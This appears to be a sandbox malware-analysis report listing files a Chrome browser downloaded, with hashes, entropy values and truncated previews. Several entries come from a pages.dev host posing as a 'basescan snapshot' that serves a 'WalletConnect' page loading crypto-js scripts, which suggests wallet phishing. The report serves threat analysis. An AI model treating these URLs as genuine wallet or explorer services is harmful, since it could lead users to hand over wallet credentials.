                                                                                                                                                                                                                                              SHA-512:DFC53A98CCF30818209B15A2A8DFBEA12D3361E2B7A62EDFD049028A1F5EE26212007A6CC92757DDD5335B8A1293848BC9A92DE8C8067FA7D9FC50D84958CA3E
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:.PNG........IHDR..............dS`...HPLTE................................................................2r....tRNS. ...`@`..p@0.P...`.`......OIDATx...r.*...&......oz+..'.....[9.b.A..j..r.....R.c..I1.{J....J;_.......WF.7.8....bR..vq.[..qIM....IF.%y5...O..A..U....q[.b......u.._p.Se.4........K...cc.....]."jE..y...2...f..b.u..Nf@.../.n/.0.........[....:7.F8.a.. .m ..+#.LU...Q-5B+#A"..-U...U...'.......Yb.9{.H.:oKG&...8....]<7.a....]77.d......35...P.J...C..~-.8.ja.=r..].U..%.\..x...p.OE....R..g\..z_.e.eb...n70%..3.......(c..@A.,-...pvd.!.(CQ..J..u.C.R^.;.ev..m.!.w1M!..h...q\2..Kr.....w.........c....s.......i...Bn.....!.;;.."...!,..H(.Q..D.....I.Y$3D3D..5.8rJr8v.+.....C.+Q.q.$...(=..C...U..d.uo.....8Y>.m;~.JL..|..+..;Y...J.F.....'.=c|O.$.3..Y>.GP%...0.h.......M....e;.......v.r.#L.4...7YE.._mb].E6@...V..."C.......Q5.@.3.(...m...Ef.`:.*..#+..P....p..Qs.|..|...n..?B..../l....A..".H.7..@ih@...C....Q......)U.).\.n%E...:MHbND|*.,...)...Z....,...M..
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/config.js
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):1556
                                                                                                                                                                                                                                              Entropy (8bit):7.875091648046964
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:48:8mhdQu/ZtCK4Ny/LkZknfNHsipa8fgywjpw7z:zWUZCoTkKaUwO7z
                                                                                                                                                                                                                                              MD5:DAEF985448A4AD7D314019047D4E8E48
                                                                                                                                                                                                                                              SHA1:DC78C7C9E050C3CF6BD52F1CDB4E43A57934C0F9
                                                                                                                                                                                                                                              SHA-256:D3753988474FEBEC6DB97ED19DF7CBF0AA6CD58606D25ED1B238366DF0229D06
                                                                                                                                                                                                                                              SHA-512:C9026A272B670FF9E335C0FE8BBD53D99EE0CCED1AE4D10CB093343DF012C495F6445E5174D2D7227F96DF1FAE50B05A62FD58170A87F94C1181EA194295D8AB
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/coin/TRX.black.png
                                                                                                                                                                                                                                              Preview:RIFF....WEBPVP8L..../c...w.m#A..?..m.KC@P..4.....O..m$I.:&,.....Z........G.....t.$....9.|&.....I........L..c.s=........\.......'..C.;.p..'T.........l....l.-...F.....p%.....=L&...=G..$IU3..r$............t<z...G..r.....>..W`.u..8...V#0.h..g..f14..m.x.!=-..f .........../`A/.?Q>'`I.OAv.`M.;)~.`U._.`5....Ix.+X..1o/p.zy3d.}......,&.w..(*....[;..q....Qi..v...|...2... .v..f.7C..'.}zl..h.d..6....."..C..]..D.?/...0.x.MVz}.e......../.=.{....~..-v%..t`.....#.FU...Z.)f...B.VH..U!!..}../..A.b:..Ub..N..%\.z.We"D...JT.?.S...$.(e.~.*..e..~c.....MZ.r6.]..;....v..p.%..Ur..=~.N.Q.y..M.3.)..O......zS..<...).....R..d.0...[<.f.....r..W...>m........z..'../.|."..}.@...Z{..a....../.Q...U.m...=.5......Bl..c.&t..v.j....`..Tg.%.I.|_`.@m'...^{i./M...W....=.)..A.`.v..$9.'.....x....S..V. ..^.E.J)../.l.f<.&.(j.p.j....%t..XN.LEu..3......U.^$..C....0..rA.Ng....".D.gz).A.....a.r......J...J.R+h`....t.j......n....r..2...w...u.dj....d.[.l..Q!V..1F.U...F..H..n.GY.U.l.E
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (448), with no line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):448
                                                                                                                                                                                                                                              Entropy (8bit):4.6658645268939996
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6:0kvFrW30s0s0s0s0s0s0s0s1PAQUGkm6SfVVVVVVVVmn:0k8AQUG/6Sun
                                                                                                                                                                                                                                              MD5:E0A0853DD5410449F4772C5BD685C2E8
                                                                                                                                                                                                                                              SHA1:8237A07D989634E40656FFCAE6BC6423D2961B50
                                                                                                                                                                                                                                              SHA-256:5C30D77947130A53DCB11F3FEC526CAF0FB9171DC56897C85A9F4835E2034C97
                                                                                                                                                                                                                                              SHA-512:DD13DD1C7AFCF22BC8360CD1D0BC159193FD9E2F9FD0AB80E93A765C7001A09859794AE78626D2D648C43488E7B6F5BF407D08ABD9F94B79EAD864416CF6231A
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzIShwEJkw-xsEfTNHMSBQ0aaYzfEgUNPR9TPBIFDVqx1xASBQ3BobYcEgUNwaG2HBIFDcGhthwSBQ3BobYcEgUNwaG2HBIFDTHlL_4SBQ0G7bv_EgUNBu27_xIFDQbtu_8SBQ0G7bv_EgUNBu27_xIFDQbtu_8SBQ0G7bv_EgUNBu27_xIFDQbtu_8SFwlliF59AADj3BIFDRppjN8SBQ09H1M8EhAJQQnSEmcErloSBQ1asdcQEiwJWgTXv1i4Y2QSBQ3BobYcEgUNwaG2HBIFDcGhthwSBQ3BobYcEgUNwaG2HBJPCeOnJjUFUj4tEgUNMeUv_hIFDQbtu_8SBQ0G7bv_EgUNBu27_xIFDQbtu_8SBQ0G7bv_EgUNBu27_xIFDQbtu_8SBQ0G7bv_EgUNBu27_w==?alt=proto
                                                                                                                                                                                                                                              Preview:CqIBCgcNGmmM3xoACgcNPR9TPBoACgcNWrHXEBoACgcNwaG2HBoACgcNwaG2HBoACgcNwaG2HBoACgcNwaG2HBoACgcNwaG2HBoACgcNMeUv/hoACgcNBu27/xoACgcNBu27/xoACgcNBu27/xoACgcNBu27/xoACgcNBu27/xoACgcNBu27/xoACgcNBu27/xoACgcNBu27/xoACgcNBu27/xoAChIKBw0aaYzfGgAKBw09H1M8GgAKCQoHDVqx1xAaAAotCgcNwaG2HBoACgcNwaG2HBoACgcNwaG2HBoACgcNwaG2HBoACgcNwaG2HBoACloKBw0x5S/+GgAKBw0G7bv/GgAKBw0G7bv/GgAKBw0G7bv/GgAKBw0G7bv/GgAKBw0G7bv/GgAKBw0G7bv/GgAKBw0G7bv/GgAKBw0G7bv/GgAKBw0G7bv/GgA=
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/loaderImage.gif
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:PNG image data, 100 x 100, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):4026
                                                                                                                                                                                                                                              Entropy (8bit):7.905289341226643
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:48:Dgufcd+2QlT14i7ydNOxh7WeqzuipLSLlvW0AyTiJkcIWH2YJcR79BKHyoBKeLtd:MdOTCuZKfLShvWHJk+RU9BgrS/FYZ
                                                                                                                                                                                                                                              MD5:A24D38BB7C6549C7F26B0750CFB1D6B4
                                                                                                                                                                                                                                              SHA1:D355719670A8819CDE1D2A315C9432F9C19346F9
                                                                                                                                                                                                                                              SHA-256:0463A3A3872E56F2593B41A85CE4B32A2123C84FF0588E3512A084F5E5948413
                                                                                                                                                                                                                                              SHA-512:B0AE549057B26263C938B94EA2D60AA2F9223EF03987CA562E85054F5548B0F11913EB721459713374BE9A3A91E885F20F3C33A50E766634C8361A85E9726ED1
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:.PNG........IHDR...d...d.....G<ef....sRGB.........PLTE.^/.[..a1uN!.~.h7.`0.]/._-._.wP#.\/sK...W*.c3}U).X.{T'.a2.X+._1rG..e5zR%.j;..Z/._-..vO6.Z,.vK.nB.mE...h;.l?..qF.b8.h@.d:nK3.e;.tJ.W...{.p.kCvB..c7..sH.b5.}s..t...x.k.pG.wR5..~iH3.~e...];...qM5.i?.wMyT2......|@...si.d:.xo.f<....|V2..y....sG!.i^.c6.d@qM?.Y0....sJ&.V*.Z#.[N{VIwM0{U7.[:.]6._<vQDuN).`0.nd}W7.kAxR..Y9._S.V..z`xR(.[5.a?kH6tC..@.._0.dZ.jF...oPsP2.}nJ:.uX.`6.d;.[1.E..Y4wI,...@.uO;.q.R.{S?..A..}..t.v.\JzD".H.......c8.gA.U.zQ8.YF...a3}V..{i.zc....K..N..nQ.sX..z.u^.uf........ub..o.dT.jX...tZ.Y+.~i....B..kJ.s....n]....t.~.iJ.]0.M1.r[.bU.kS.R>.VB....n`...S$.C .D!.bK...M'.}f.T9.c<.Y$.[5.eA.F!.hK.T>.}..{L3.G*.V6.K0.K).`;.`C{N*.w...fH.|i.jR..k.W2.P'.^I.bS.s`.L4._E.iS.ZF.hV.^Ho,.w...hIDAThC...TT.....RP...Q..Q....hD..R-.b.hqi.. ....@k..B...8..:i.L.%..P....5VE.Fc*..}...|.].}o..9...2.y.....A.Grsss.qrrp.$.Ng...O.......M..........lm.u.........dccc...C.
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:PNG image data, 100 x 100, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):2110
                                                                                                                                                                                                                                              Entropy (8bit):7.773354448310646
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:48:YfCLh7Oo0CwMH17aN6faof3fannsNp7lQfOENWri8b:i8OhiaNniunO5Rim
                                                                                                                                                                                                                                              MD5:0BDF8596F518D2FD50FD812528FD02CA
                                                                                                                                                                                                                                              SHA1:355BDAA7A41AF2DE9EC1B4D0D6368D8EA42B9834
                                                                                                                                                                                                                                              SHA-256:32E83A17860DF5BF2C3E14B8AB072807710EC1B7B0159A9B0F34AC6608B2B770
                                                                                                                                                                                                                                              SHA-512:62CE50616737C90D2566F2A86E1CE8DFA7575ACE00E64937B41388AF7EE6C8247702A669849E2B44C9924D6AFD1D62B8E2C91B7E7462930B6C7DFFB9793F6615
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:.PNG........IHDR...d...d.....G<ef....sRGB.........PLTE.....3..;..9..6..7..1..7..1..3..5..4..3..5..1..2..0.1..2..2.2.2..1..0..0..1.1..0.0..1.1.1..0..0..1..1.0.1..0..1..1..1..1..0.1.0.1..1..0..1.......................................................................................................................................................................................~..}..|..{..y..x..w..u..t..s..r..q..p..o..n..h..g..f..e..d..c..b..^..]..\..[..Z..Y..X..W..V..U..T..S..R..R..Q..P..O..N..N..M..L..K..J..I..H.=.5.4.2.1.0>q?2...2tRNS.........#"'(09=OX\`l.............................J.......IDATx....[TG...A.)..{.X..Y.F.^@.=...v...kz/.(.JS4,.......).........]/{.3#b....[\Z.........Yi..cJ.,.."P..(>..*0.rR..43...*.)..U..4....$....`a....FLIc..1E.....2.T$....$...z....>].&..\..u...8.....A.W*..R...o...~0.S.$>...U.Mhy.F..5{../.P..`..~.I.1V..R...X.....uI....*.X.....a.W..pC.<.."N...dX.V.E:.OeC.<.#].....d.Y.x...$.+...Q)...
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):188800
                                                                                                                                                                                                                                              Entropy (8bit):7.996005383951221
                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                              SSDEEP:3072:UDOyQZLxqxPf7dwwjn0VvC6zNLLunFh+oq7xLPfiPnuH9dXJyjDS10pn/:UDKNqd7dwyn0k6zZuOcuvcjDD/
                                                                                                                                                                                                                                              MD5:CCCDCBF76626887F7C8AFBC4C4D46F6B
                                                                                                                                                                                                                                              SHA1:497D89EC807B8C5ADCDC18AED053C3B7DADBC1AF
                                                                                                                                                                                                                                              SHA-256:AE1326D0E3D4DB52A8314A344C49D2B04E97844BDED7AA44879AB48731235ADD
                                                                                                                                                                                                                                              SHA-512:16AC69FBB2BCBD52F186C0C3F2052CE7F096C027BF89725DF7B448624C0CC9B0C22963E0E5B8D1B6E67E79598632822FCBA7854489BA764603E97405AC9C85DD
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/assets/racing-BfvulUJj.png
                                                                                                                                                                                                                                              Preview:RIFFx...WEBPVP8Ll.../?....9...".{|...t.......$.`.6.-p.c.}.........#I.").y...{....A....rS...XH.zh...<WYQ..0...C..........=){.D..X.......'.8.7.|..S..46.o.r..i..iC9R......<. &.n.M....wq}...(4z.j.(........).r1R.g2....0..,......f.0I.$n...5...9.h.l........n....B...]..U....Q.!.a...AH1.E.B.E...b...%...DI..Q....E.]...\a/4W...mj..M..aP.J......Q"*.{0...;...t.... .M.)........=.`..;.Q_)...iU.....?...../].../.....<..P...;.AnYd."........`......n..*..|.r<t>n...q..n..../...~..+%X.qjJD.-.....Q.b...(4!.\5.,..=O...........:..7:N..bv....U.*.?^...y....U.]....4....N.,@...../...cT:..Y.._E..\.}.6.VkZ.I..w.^n.=|.J.L9.`DM... ..E........ewQ.$.m.I...W.:.S..[DL@.......B..)7.&.=.K.j....Z.$...............'..#?.2P.1..dz>M?....^...m....wU......aUP..2@_.ed...$.s..F....D.........'....U.DQ.(..*K...PNB..)oTTPf.'D@X.d..p..Q0..Qk[..r....cNy>8......m..6a.1.j.-.....p_i.e.nG.-....^.C@.}.=@..%W"..Y..@r7@.C.6......7.-O..$i......q..(..@.D.8...S.&.-.B.$m.R.V%...-r.....dP&...8.g."B....N.
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (798)
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):799
                                                                                                                                                                                                                                              Entropy (8bit):5.0680263939742
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:12:JDvsSEcCaM5oNhFg+RAVseKSTrw9h/GdrmZXejaRsvJPF8e/CnvPAWY6gzfJ+y:JLstcCRYFDAVsDIrAJGd9j/JXMvPq6s5
                                                                                                                                                                                                                                              MD5:161868FAA5523780D8B7DDA32FE8FA94
                                                                                                                                                                                                                                              SHA1:843B060F3E985BE622C0664C65ED8D55C6D77FDE
                                                                                                                                                                                                                                              SHA-256:2F34BCDFF4C699B03A3C8516E7776BBE20D9A1511187A4DF1A2E9D21292EA3D1
                                                                                                                                                                                                                                              SHA-512:6CA2380F599A897DAFF87E2BE05EA2CB231EB587E914E0798A59F11AFA92873A1CBFBF579D4E0A893B221E415F56217B8920DFE06A8B03DBCD7CCCF9ABF6D41A
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:var f=typeof global=="object"&&global&&global.Object===Object&&global;const l=f;var s=typeof self=="object"&&self&&self.Object===Object&&self,g=l||s||Function("return this")();const j=g;var u=j.Symbol;const o=u;var a=Object.prototype,y=a.hasOwnProperty,O=a.toString,e=o?o.toStringTag:void 0;function S(t){var r=y.call(t,e),c=t[e];try{t[e]=void 0;var i=!0}catch(m){}var b=O.call(t);return i&&(r?t[e]=c:delete t[e]),b}var d=Object.prototype,T=d.toString;function p(t){return T.call(t)}var v="[object Null]",$="[object Undefined]",n=o?o.toStringTag:void 0;function h(t){return t==null?t===void 0?$:v:n&&n in Object(t)?S(t):p(t)}function w(t){return t!=null&&typeof t=="object"}function P(t){var r=typeof t;return t!=null&&(r=="object"||r=="function")}export{o as S,w as a,h as b,l as f,P as i,j as r};.
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (5945)
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):318187
                                                                                                                                                                                                                                              Entropy (8bit):5.568671698482269
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6144:k43PpmFU7dlq04d7z3KsOemve1NlX0fxnQZ:N3QW7dQnhDuG
                                                                                                                                                                                                                                              MD5:A52264DAFBC04374FA5E4CB6530571BB
                                                                                                                                                                                                                                              SHA1:FEF246C599E2B3C87E806722A7839EC9E4E1F040
                                                                                                                                                                                                                                              SHA-256:5BB5FBC5D7EC549A80F34B6214B10B4B0C8F007B041E435B15DC05D9FD3A4CA5
                                                                                                                                                                                                                                              SHA-512:81DB87569A656B73B69F9D59473B1C46FAB290FE5E7FAC0598E5587EEF94BCC9DEC39591C11C8CAA0999B35F454C79B99D5917BFC0970F464562401CC2F56DA6
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"1",. . "macros":[{"function":"__e"},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_1p_data_v2","priority":13,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":"","vtp_phoneType":"CSS_SELECTOR","vtp_phoneValue":"","vtp_streetType":"CSS_SELECTOR","vtp_autoPhoneEnabled":false,"vtp_postalCodeType":"CSS_SELECTOR","vtp_emailValue":"","vtp_firstNameValue":"","vtp_streetValue":"","vtp_lastNameType":"CSS_SELECTOR","vtp_autoAddressEnabled":false,"vtp_regionValue":"","vtp_countryValue":"",
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:PNG image data, 200 x 267, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):34668
                                                                                                                                                                                                                                              Entropy (8bit):7.992040746895139
                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                              SSDEEP:768:f4HQ1r//lPHfmcBHTFhrNHUWj4xAaSLRRoDgg7Ekb:/lGGZxF14xEVwb
                                                                                                                                                                                                                                              MD5:A02257172FF1612DB5EBE365579780EF
                                                                                                                                                                                                                                              SHA1:9B0580A0F4ACC30F2FC13A282AAB11F3F87AB9CF
                                                                                                                                                                                                                                              SHA-256:6D9F4139DB087455B1A3FB91AC63399855F1DA816AF3C20CBC16E871ACFE859A
                                                                                                                                                                                                                                              SHA-512:3EA2F0E75E91D9756B1DC3BCDD25A7B5A3A64CBA32BBB6233DB31FEBD9D6FE34837B9026E52E58E11963CD37CE27B5F2031B4E8D4325F51E37B8C436800D63F9
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:.PNG........IHDR..............1^g....sRGB....... .IDATx^.y.%.y..G..~}.3.s...}`....X.$..0...C4-R!..L.....K..c+..A+.d8.t.d0......x. .......].bwgwgv...]U.........!...~]..../.../........;r.mG......o.....}O...........}O...........}O...........}O...........;.$..#w.;..s..........N.........m....=...Q...........hW.;...9..m.......W........n....<.=.V..3+..y......-.....~......5IB....rS..._m..Q.......U.d.#....k.c.4.$.L ....I^_^.d..R...";D..X.9...........v....Q.G#2...$)a<k......o.p|.-.d...c.8.f..~..9L.2..c..X]H0,..d......+.5!.....u..0.t......1..P....c)0.....<1.i......}!...a..V..aL.0.........&.0O......`...a...3.9F<....B...<.,|.....a.qF...:........9 rH.......@...!.$G<m.}m.S7pJ1`..fw..*T!.6...KzK.".`...b.!.!.$b.q!..\..$.p.V.g....i...bw$....`.............."D.%.>'.WH$%..%1.m....^Hn<.....C+.....0&..'.../.).x.I.......R..b..H.!".N.......Nzy7{m........o...\...'....;E.0A...wf.../....FK....z..... <H$..Lf......dusty+yuo...':./.B..i;|.:....1!....].9MdDq...K"
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):64
                                                                                                                                                                                                                                              Entropy (8bit):4.269608306496812
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:TMQWfXAotcGBtaBfFEC:ALMBX
                                                                                                                                                                                                                                              MD5:0706F9A4AF62E45FE10BA424B571D291
                                                                                                                                                                                                                                              SHA1:1AC62EDFFE0F55283C869EE6598F9953AA7391AC
                                                                                                                                                                                                                                              SHA-256:32C7F18860C1DF99D40910996452BCDD0B1FAE866FE849D9DFD21D8D57BC762C
                                                                                                                                                                                                                                              SHA-512:783675C115F8CF797D0E2F1A481EB9DDEDD2DBC54033A7D21D4ECE0269A3CCDE76FBC3B099AF050D4499F492996AA4B381A514C4DA315B7DFDDE0722935A5654
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/assets/_basePropertyOf-BhSQSS-6.js
                                                                                                                                                                                                                                              Preview:function e(n){return function(r){return n?.[r]}}export{e as b};.
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/config.js
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):354253
                                                                                                                                                                                                                                              Entropy (8bit):5.452838789022815
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6144:W/NI0mVIUEkmlURnG5Z645bk6pqPk8iMCAfCStdnpmjnNtd9nDXjhcApwTbLEdex:W/SVKuRn9ZU1V5Un
                                                                                                                                                                                                                                              MD5:ADF9CE8FF3CE8B4BC923C5C9EF2CD9EE
